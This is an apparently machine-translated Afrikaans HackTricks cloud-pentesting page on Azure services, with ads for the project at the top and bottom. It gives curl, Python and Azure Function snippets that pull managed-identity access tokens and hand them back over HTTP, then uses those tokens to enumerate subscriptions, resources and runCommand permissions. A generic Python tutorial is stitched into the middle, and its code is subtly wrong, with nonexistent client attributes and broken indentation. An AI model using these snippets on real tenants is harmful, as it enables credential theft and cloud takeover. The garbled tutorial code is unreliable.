Az - Services

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
Kry die amptelike PEASS & HackTricks swag
Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-repos.

Portale

Jy kan die lys van Microsoft-portale in https://msportals.io/ vind

Rou versoek

Azure API via Powershell

Kry die access_token vanaf IDENTITY_HEADER en IDENTITY_ENDPOINT: system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');.

Vervolgens ondervra die Azure REST API om die subscription ID en meer te kry.

$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

# List resources and check for runCommand privileges
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'

Azure API via Python Weergawe

Hierdie gids demonstreer hoe om die Azure API te gebruik deur middel van Python. Dit sal jou help om te kommunikeer met verskillende Azure-dienste en funksies deur middel van 'n Python-program.

Vereistes

Python 3.x
Azure SDK vir Python

Installasie

Installeer Python 3.x op jou rekenaar.
Installeer die Azure SDK vir Python deur die volgende opdrag in die opdraglyn uit te voer:
```
pip install azure
```

Gebruik

Maak 'n nuwe Python-program en voeg die volgende invoer aan die begin van jou program:

from azure.identity import DefaultAzureCredential
from azure.mgmt.resource import ResourceManagementClient

Stel die verband met die Azure API in deur die volgende kode by te voeg:

credential = DefaultAzureCredential()
subscription_id = "<jou_subskripsie_id>"
resource_client = ResourceManagementClient(credential, subscription_id)

Gebruik die resource_client-objek om te kommunikeer met die Azure-dienste en funksies wat jy wil gebruik. Byvoorbeeld, om 'n lys van alle virtuele masjiene in jou Azure-rekening te kry, voeg die volgende kode by:
```
vm_list = resource_client.virtual_machines.list_all()
for vm in vm_list:
    print(vm.name)
```

Verwysings

Volg hierdie stappe om die Azure API suksesvol te gebruik deur middel van Python.

IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']

print("[+] Management API")
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

print("\r\n[+] Graph API")
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print(json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

of binne 'n Python-funksie:

import logging, os
import azure.functions as func

def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
return func.HttpResponse(val, status_code=200)

Lys van Dienste

Die bladsye van hierdie afdeling is gerangskik volgens die Azure-diens. Daar sal jy inligting oor die diens vind (hoe dit werk en vermoëns) en ook hoe om elke diens op te som.

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy jou maatskappy in HackTricks wil adverteer of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
Kry die amptelike PEASS & HackTricks swag
Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel jou hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.

PreviousAz - Password Spraying NextAz - ACR

Last updated 2 months ago